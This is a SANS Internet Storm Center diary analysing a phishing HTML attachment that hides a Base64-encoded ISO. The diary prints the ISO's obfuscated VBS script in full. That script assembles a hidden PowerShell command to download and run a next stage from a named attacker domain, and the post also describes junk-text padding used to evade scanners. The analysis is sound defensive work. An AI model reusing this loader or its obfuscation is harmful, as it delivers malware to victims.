Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: SANS Internet Storm Center SANS.edu Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

Malicious ISO Embedded in an HTML Page

Published: 2022-01-28
Last Updated: 2022-01-28 05:34:08 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

I spotted an interesting phishing email. As usual, the message was delivered with a malicious attachment that is a simple HTML page called “Order_Receipt.html” (SHA256:a0989ec9ad1b74c5e8dedca4a02dcbb06abdd86ec05d1712bfc560bf209e3b39) with a low VT score of 5/59[1]! This is a text file and, therefore, looks less suspicious. When the page is opened in the victim's browser, it displays a simple message and offers the victim to download an ISO file:

The beginning of the page is filled with junk text that is not displayed:

<center>
<p> <p style='display:none;font-size:0px;'>In modern times a starter can hard
...

Probably to defeat basic security controls that check only the very beginning of files. The ISO file is embedded in a Javascript function and is, as usual, Base64-encoded. Once decoded, the payload (SHA256:7c1aac4e785f82b997cf5252925c90252c1af1262283b5edbf7f4113c74e251e) has a VT score of 10/55[2]. It’s interesting to see that the HTML file is brand new but the ISO file is already 2 months old! (based on VT results)

Most Windows systems today are able to open ISO files without extra software but this one is not formatted in NTFS and can’t be mounted by a stock Windows 10:

Once mounted, the ISO file discloses only one file: a VBS script:

remnux@remnux:/MalwareZoo/20220127$ sudo mount -o ro APVSTYS43574.iso /tmp/iso
remnux@remnux:/MalwareZoo/20220127$ ll /tmp/iso
total 23
dr-xr-xr-x  1 root root  2048 Nov 12 10:15 ./
drwxrwxrwt 24 root root 20480 Jan 27 15:31 ../
-r-xr-xr-x  1 root root   807 Nov 12 10:15 APVSTYS43574.vbs*

The VBS script (SHA256:ddb517300a9f93fad769e003cb9d3cfeb66231c1ff8a359ff39ddb2c07ff10e7) is unknown on VT. It is obfuscated but easy to decode:

AOKO = ("t.S")
KITK = ("p"+AOKO+"h")
OEWM = ("i"+KITK+"el")
VURQ = ("Scr")
Set RCLD = CreateObject("W"+VURQ+OEWM+"l")
ZCZI = "mm"
HBMV = "pow"
MNGZ = "ell"
VADV = "sh"
VEIF = " -Co"
OLMG = "er"
OQGT = "and "
UYFU = "[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname"
JNUZ = "((New-Object Net.WebClient),'Dow^!loadStri^!g'.replace('^!','n'),[Microsoft.VisualBasic.CallType]::Method,"
VORR = "'++++++++++++++++++++++++###################'.Replace('++++++++++++++++++++++++','https://cozumrekla').Replace('###################','mkayseri.com/.Fainl.txt')"
WJKC = ")|IEX;[Byte[]]"
OLHB = "$f=[Microsoft.VisualBasic.Interaction]::CallByname"
RCLD.Run HBMV+OLMG+VADV+MNGZ+VEIF+ZCZI+OQGT+UYFU+JNUZ+VORR+WJKC+OLHB,0

It's pretty easy to understand: A mix of small strings is concatenated and others are replaced. The VBS script tries to download the next stage from hxxps://cozumreklamkayseri[.]com/.Fainl.txt. But the site is down. I found the last known IP address thanks to passive DNS services. But the site does not serve the malicious payload anymore...

A pretty nice example of a message that can still bypass many controls today... 

[1] https://www.virustotal.com/gui/file/a0989ec9ad1b74c5e8dedca4a02dcbb6abdd86ec05d1712bfc560bf209e3b39/details
[2] https://www.virustotal.com/gui/file/7c1aac4e785f82b997cf5252925c90252c1af1262283b5edbf7f4113c74e251e/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Keywords: ISO Phishing
0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Apple Patches Everything
Jan 27th 2022
1 day ago by Johannes (0 comments)

Over 20 thousand servers have their iLO interfaces exposed to the internet, many with outdated and vulnerable versions of FW
Jan 26th 2022
3 days ago by Jan (0 comments)

Local privilege escalation vulnerability in polkit's pkexec (CVE-2021-4034)
Jan 25th 2022
3 days ago by Bojan (0 comments)

Emotet Stops Using 0.0.0.0 in Spambot Traffic
Jan 25th 2022
4 days ago by Brad (0 comments)

Mixed VBA & Excel4 Macro In a Targeted Excel Sheet
Jan 22nd 2022
1 week ago by Xme (0 comments)

View All Diaries →

Latest Discussions

Dshield Sensor
created Jun 8th 2021
7 months ago by Rick (0 replies)

API port data
created Apr 25th 2021
9 months ago by JJ (1 reply)

RSS feed containing non-XML compatible characters
created Apr 14th 2021
9 months ago by Anonymous (1 reply)

Handler's Diary (Full text) RSS Feeds stopt working due to a typo
created Mar 5th 2021
10 months ago by bas.auer@auerplace.nl (0 replies)

port_scan issue in Snort3
created Feb 23rd 2021
11 months ago by astraea (0 replies)

View All Forums →

Latest News

Top Diaries

A Quick CVE-2022-21907 FAQ
Jan 14th 2022
2 weeks ago by Johannes (0 comments)

Obscure Wininet.dll Feature?
Jan 21st 2022
1 week ago by Xme (0 comments)

Use of Alternate Data Streams in Research Scans for index.jsp.
Jan 14th 2022
2 weeks ago by Johannes (0 comments)

Shadow IT Makes People More Vulnerable to Phishing
Nov 10th 2021
2 months ago by Xme (0 comments)

Apple Patches Everything
Jan 27th 2022
1 day ago by Johannes (0 comments)